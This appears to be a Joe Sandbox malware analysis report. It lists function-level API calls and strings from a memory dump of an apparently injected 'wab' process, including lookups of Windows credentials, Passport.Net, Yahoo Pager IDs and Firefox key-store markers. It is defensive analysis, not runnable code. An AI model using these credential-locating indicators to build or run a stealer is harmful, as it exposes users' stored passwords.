                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                            • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                                                            • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                                                            • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                                                            • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                                                            • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A78
                                                                                                                                                                                          • memset.MSVCRT ref: 00403A91
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406129
                                                                                                                                                                                            • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                                                            • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                                                          • memcmp.MSVCRT ref: 00406154
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406199
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: global-salt$password-check
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                                                          • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                                          • String ID: XgD$rY@
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00406376
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406389
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                                                            • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                                                            • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406420
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406435
                                                                                                                                                                                            • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E43
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E5C
                                                                                                                                                                                          • memset.MSVCRT ref: 00443E70
                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                          • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset$strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2142929671-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F133
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                          • String ID: Passport.Net\*
                                                                                                                                                                                          • API String ID: 2329438634-3671122194
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                          • memset.MSVCRT ref: 004032FD
                                                                                                                                                                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040334C
                                                                                                                                                                                            • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040338E
                                                                                                                                                                                            • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                          • String ID: Personalities
                                                                                                                                                                                          • API String ID: 2103853322-4287407858
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                          • API String ID: 2859077140-3316789007
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00443A57
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                          • API String ID: 1830152886-1703613266
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409031
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {?@ UD, xrefs: 0040900D
                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                                                          • API String ID: 408644273-2682877464
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,774171C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                          • API String ID: 145871493-1506664499
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID: $no query solution
                                                                                                                                                                                          • API String ID: 368790112-326442043
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 2221118986-2852464175
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                          • API String ID: 231171946-3708268960
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                          • API String ID: 3510742995-3170954634
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: winWrite1$winWrite2
                                                                                                                                                                                          • API String ID: 438689982-3457389245
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: winRead
                                                                                                                                                                                          • API String ID: 1297977491-2759563040
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                          • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                                                            • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                                                            • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                                                            • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                          • API String ID: 3337535707-2769808009
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 125969286-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                                                            • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                                                            • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                                                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                            • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                            • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                            • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                          • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                                                          • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                                                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2374668499-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
